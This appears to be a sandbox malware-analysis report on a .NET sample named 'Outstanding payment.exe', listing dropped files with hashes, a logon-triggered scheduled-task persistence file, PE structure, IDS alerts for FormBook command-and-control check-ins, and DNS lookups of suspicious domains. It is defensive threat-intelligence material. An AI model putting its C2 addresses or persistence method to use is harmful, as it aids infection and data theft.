Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iBSWjb.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\iBSWjb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380285623575084
Encrypted:	false
SSDEEP:	48:+WSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeoM0Uyus:+LHxvCsIfA2KRHmOugU1s
MD5:	DF955507FBE64D94C86A0F629F298531
SHA1:	33507D77FEF2D184410666E0326801215E4867E6
SHA-256:	2329221C88D5F3CBFE5F03251DE7B6AA039DA4647C15FAD7E4307255040C6EE4
SHA-512:	AB556486B6EFDB904A3E6A476FC8F7C1B546DA213E1B724C9392B23800027BD8C5B8C4F2D3D7430D1E5BA5D26C3ADC941BD041D732C5BEF1632249D8FFA11479
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03hkkdh3.ypg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34qw05zq.w2b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52eucve1.ftn.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anq4t5ds.b1y.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxxbcmwh.nng.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhuexac3.cpk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rodvztqb.mdz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrdf23vf.zzk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp

Download File

Process:	C:\Users\user\Desktop\Outstanding payment.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.102072259417084
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNttVxvn:cgergYrFdOFzOzN33ODOiDdKrsuTtrv
MD5:	2E914F9D6A61B792D977724AC15A9C75
SHA1:	40E723959AA03FC7ACA8D54208073DDCED344698
SHA-256:	24DFCB135700526DD3B377DACE2E96B87A73AA3F8EC5BFA8E2F195BA1EE770CF
SHA-512:	3FD597BD6B3F6CF849C7813BE97220BF65E5E1C17A717C1C038BD3F7C93DDE6F0AE6C83FEA17AD5E6C5077E10973A9275AE384127AA7D59E59CB63C6D0748FC5
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpF30F.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\iBSWjb.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.102072259417084
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNttVxvn:cgergYrFdOFzOzN33ODOiDdKrsuTtrv
MD5:	2E914F9D6A61B792D977724AC15A9C75
SHA1:	40E723959AA03FC7ACA8D54208073DDCED344698
SHA-256:	24DFCB135700526DD3B377DACE2E96B87A73AA3F8EC5BFA8E2F195BA1EE770CF
SHA-512:	3FD597BD6B3F6CF849C7813BE97220BF65E5E1C17A717C1C038BD3F7C93DDE6F0AE6C83FEA17AD5E6C5077E10973A9275AE384127AA7D59E59CB63C6D0748FC5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\iBSWjb.exe

Download File

Process:	C:\Users\user\Desktop\Outstanding payment.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	840704
Entropy (8bit):	7.534937195061882
Encrypted:	false
SSDEEP:	12288:xugQMUam4GTyWXV7O2mH8pfh388BAov2Zecy8uVdUSuOGpKmW1W63PXGT:xu35nxOH8vTBAovWy8mU5fc/O
MD5:	43DC8C62E9343EB01C3FFB53390E2A55
SHA1:	AF544600A7CBA01ADD858593C892C58FE8D9B024
SHA-256:	07ABBE06A2D17F142846D33BDA215DF5B05355148C781CB9FF1C8F233F534CBC
SHA-512:	3EFE1503E46C46CB85245C9AD866A509814D5E78AC64A4C88A30513B892F6629739F9C07C551F33DE4F60A7AE4FE84E05FBB67AADF0CF78C0778433C4951D2FA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...qz.g..............0......8........... ........... ....................... ............@.....................................W........5........................................................................... ............... ..H............text........ ...................... ..`.rsrc....5.......6..................@..@.reloc..............................@..B.......................H.......`...T.......O..................................................O..O....c.0Dk......;M..?...1=.".[......va..+2O....d..h....4T.....V.....wN.3y:.q%....D."...R.,...@....J.m..5.B.YE..u..;....i....j.....j3...)..p.?.pOe.....Q@... .Gr........#.".P......[/..ZAT.\"q.:#....R9.jB..>....X..%={.b....p.G.P...}.....P..Dw.1..m...N.$..J.....Q'.JFa.HPx..,...qB.<....L.a.P...a.T.+..WB....._...q.O...&..z>..#$.........T...@..M...&OO\|E....{.`ko7.:.....So.W..C.\|....

C:\Users\user\AppData\Roaming\iBSWjb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Outstanding payment.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.534937195061882
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Outstanding payment.exe
File size:	840'704 bytes
MD5:	43dc8c62e9343eb01c3ffb53390e2a55
SHA1:	af544600a7cba01add858593c892c58fe8d9b024
SHA256:	07abbe06a2d17f142846d33bda215df5b05355148c781cb9ff1c8f233f534cbc
SHA512:	3efe1503e46c46cb85245c9ad866a509814d5e78ac64a4c88a30513b892f6629739f9c07c551f33de4f60a7ae4fe84e05fbb67aadf0cf78c0778433c4951d2fa
SSDEEP:	12288:xugQMUam4GTyWXV7O2mH8pfh388BAov2Zecy8uVdUSuOGpKmW1W63PXGT:xu35nxOH8vTBAovWy8mU5fc/O
TLSH:	5905BFC03B25B30ECE6DAD358526ECB8A2242E24B105F5E379DE2B5BB5CD217990DF50
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...qz.g..............0......8........... ........... ....................... ............@................................

File Icon


Icon Hash:	7fe6e7e7e3e3651f

Static PE Info

General

Entrypoint:	0x110cb90e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x11000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67887A71 [Thu Jan 16 03:18:09 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [11002000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcb8b4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcc000	0x3580	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc9914	0xc9a00	c88b9261828cb89bb3139e2009aa19a9	False	0.834472353533788	data	7.532213400746095	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xcc000	0x3580	0x3600	b13ed7c1fd1917f54acf285b66f886fe	False	0.9107349537037037	data	7.684677050877403	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0xc	0x200	adad45348b447ede749d850eb90e041c	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xcc130	0x2f83	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9727041026062649
RT_GROUP_ICON	0xcf0b4	0x14	data	1.05
RT_VERSION	0xcf0c8	0x2cc	data	0.4329608938547486
RT_MANIFEST	0xcf394	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T06:39:42.137978+0100	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49979	121.254.178.252	80	TCP
2025-01-16T06:39:42.137978+0100	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49979	121.254.178.252	80	TCP
2025-01-16T06:39:42.137978+0100	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49979	121.254.178.252	80	TCP

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 06:37:38.318574905 CET	52159	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:37:38.435055017 CET	53	52159	1.1.1.1	192.168.2.5
Jan 16, 2025 06:37:59.817539930 CET	63044	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:37:59.826781988 CET	53	63044	1.1.1.1	192.168.2.5
Jan 16, 2025 06:38:19.036780119 CET	60229	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:38:19.045804024 CET	53	60229	1.1.1.1	192.168.2.5
Jan 16, 2025 06:38:39.366950989 CET	51408	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:38:39.376235008 CET	53	51408	1.1.1.1	192.168.2.5
Jan 16, 2025 06:38:59.771859884 CET	49709	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:38:59.780914068 CET	53	49709	1.1.1.1	192.168.2.5
Jan 16, 2025 06:39:20.524117947 CET	57360	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:39:20.539736986 CET	53	57360	1.1.1.1	192.168.2.5
Jan 16, 2025 06:39:41.036672115 CET	55338	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:39:41.547138929 CET	53	55338	1.1.1.1	192.168.2.5
Jan 16, 2025 06:40:01.445930958 CET	53996	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:40:01.454832077 CET	53	53996	1.1.1.1	192.168.2.5
Jan 16, 2025 06:40:42.396178007 CET	52978	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:40:42.406032085 CET	53	52978	1.1.1.1	192.168.2.5
Jan 16, 2025 06:41:02.888201952 CET	52041	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:41:02.897650003 CET	53	52041	1.1.1.1	192.168.2.5
Jan 16, 2025 06:41:23.989562988 CET	61808	53	192.168.2.5	1.1.1.1
Jan 16, 2025 06:41:24.004867077 CET	53	61808	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 06:37:38.318574905 CET	192.168.2.5	1.1.1.1	0x67e8	Standard query (0)	www.inggraphic.pro	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:37:59.817539930 CET	192.168.2.5	1.1.1.1	0x9a5f	Standard query (0)	www.elnqdjc.shop	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:38:19.036780119 CET	192.168.2.5	1.1.1.1	0x50e	Standard query (0)	www.8oosnny.xyz	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:38:39.366950989 CET	192.168.2.5	1.1.1.1	0x2556	Standard query (0)	www.nfluencer-marketing-13524.bond	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:38:59.771859884 CET	192.168.2.5	1.1.1.1	0xb293	Standard query (0)	www.atidiri.fun	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:39:20.524117947 CET	192.168.2.5	1.1.1.1	0x4ddd	Standard query (0)	www.otelhafnia.info	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:39:41.036672115 CET	192.168.2.5	1.1.1.1	0x3a1a	Standard query (0)	www.kkkk.shop	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:40:01.445930958 CET	192.168.2.5	1.1.1.1	0x73af	Standard query (0)	www.aja168e.live	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:40:42.396178007 CET	192.168.2.5	1.1.1.1	0xe248	Standard query (0)	www.lphatechblog.xyz	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:41:02.888201952 CET	192.168.2.5	1.1.1.1	0xf4b5	Standard query (0)	www.oftware-download-92806.bond	A (IP address)	IN (0x0001)	false
Jan 16, 2025 06:41:23.989562988 CET	192.168.2.5	1.1.1.1	0x70f3	Standard query (0)	www.behm.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 06:37:38.435055017 CET	1.1.1.1	192.168.2.5	0x67e8	Name error (3)	www.inggraphic.pro	none	none	A (IP address)	IN (0x0001)	false
